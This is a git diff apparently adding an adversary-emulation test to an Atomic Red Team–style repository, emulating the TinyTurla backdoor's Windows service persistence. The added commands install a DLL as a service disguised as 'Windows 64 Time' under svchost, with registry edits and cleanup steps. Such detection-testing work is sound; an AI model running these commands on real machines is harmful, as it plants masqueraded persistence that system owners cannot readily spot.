@@ -464,6 +465,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f802d2c4..8c6277f2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -455,6 +455,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] 
@@ -1158,6 +1159,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 21c0c29d..c33352ff 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -318,6 +318,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -811,6 +812,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..7d72b915 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -20485,6 +20485,36 @@ privilege-escalation: Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} + - name: TinyTurla backdoor service w64time + auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 + description: | + It's running Dll as service to emulate the tine turla backdoor + + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + supported_platforms: + - windows + input_arguments: + dllfilename: + description: It specifies Dll file to run as service + type: string + default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + executor: + command: |- + copy #{dllfilename} %systemroot%\system32\ + sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto + sc config W64Time DisplayName= "Windows 64 Time" + sc description W64Time "Maintain date and time synch on all clients and services in the network" + reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f + reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f + sc start W64Time + cleanup_command: |- + sc stop W64Time + sc.exe delete W64Time + del %systemroot%\system32\w64time.dll + reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f + reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f + name: command_prompt + elevation_required: true T1547.004: technique: created: '2020-01-24T16:59:59.688Z' 
@@ -50420,6 +50450,36 @@ persistence: Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} + - name: TinyTurla backdoor service w64time + auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 + description: | + It's running Dll as service to emulate the tine turla backdoor + + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + supported_platforms: + - windows + input_arguments: + dllfilename: + description: It specifies Dll file to run as service + type: string + default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + executor: + command: |- + copy #{dllfilename} %systemroot%\system32\ + sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto + sc config W64Time DisplayName= "Windows 64 Time" + sc description W64Time "Maintain date and time synch on all clients and services in the network" + reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f + reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f + sc start W64Time + cleanup_command: |- + sc stop W64Time + sc.exe delete W64Time + del %systemroot%\system32\w64time.dll + reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f + reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f + name: command_prompt + elevation_required: true T1547.004: technique: created: '2020-01-24T16:59:59.688Z' diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 7044982f..b82342be 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md 
@@ -16,6 +16,8 @@ Services may be created with administrator privileges but are executed under SYS - [Atomic Test #3 - Service Installation PowerShell](#atomic-test-3---service-installation-powershell) +- [Atomic Test #4 - TinyTurla backdoor service w64time](#atomic-test-4---tinyturla-backdoor-service-w64time) +
@@ -160,4 +162,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #4 - TinyTurla backdoor service w64time +It's running Dll as service to emulate the tine turla backdoor + +[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** ef0581fd-528e-4662-87bc-4c2affb86940 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dllfilename | It specifies Dll file to run as service | string | $PathToAtomicsFolder\T1543.003\bin\w64time.dll| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +copy #{dllfilename} %systemroot%\system32\ +sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto +sc config W64Time DisplayName= "Windows 64 Time" +sc description W64Time "Maintain date and time synch on all clients and services in the network" +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f +reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f +sc start W64Time +``` + +#### Cleanup Commands: +```cmd +sc stop W64Time +sc.exe delete W64Time +del %systemroot%\system32\w64time.dll +reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f +reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f +``` + + + + +